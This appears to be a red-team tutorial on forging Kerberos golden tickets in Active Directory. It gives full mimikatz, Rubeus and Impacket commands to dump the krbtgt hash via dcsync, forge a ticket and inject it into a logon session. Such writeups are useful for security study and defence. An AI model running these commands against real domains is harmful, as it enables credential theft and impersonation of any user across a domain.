Golden Tickets

A "golden ticket" is a forged TGT, signed by the domain's krbtgt account. While a silver ticket can be used to impersonate any user, it's limited to either that single service or to any service but on a single machine. A golden ticket can be used to impersonate any user, to any service, on any machine in the domain and the underlying credentials are never changed automatically. For that reason, the krbtgt NTLM/AES hash is probably the single most powerful secret you can obtain (and is why you see it used in dcsync examples so frequently).

A common method for obtaining the krbtgt hash is to use dcsync from the context of a domain admin

mimikatz # lsadump::dcsync /user:krbtgt /domain:domain.com

With that hash, the ticket can be forged offline using Rubeus or Mimikatz

Rubeus.exe golden /aes256:<AES256_KEY> /user:administrator /domain:domain.com /sid:<DOMAIN_SID> /nowrap

mimikatz # kerberos::golden /domain:domain.com /user:Administrator /sid:<DOMAIN_SID> /rc4:<KRBTGT_HASH> /ptt

And then imported into a logon session to use.

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DOMAIN /username:administrator /password:SomethingSecure123! /ticket:doIFLz ... MuaW8=

The same process can be replicated from Linux with the Impacket suite

lookupsid.py domain.com/otter@dc01.domain.com -domain-sids

ticketer.py -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain domain.com Administrator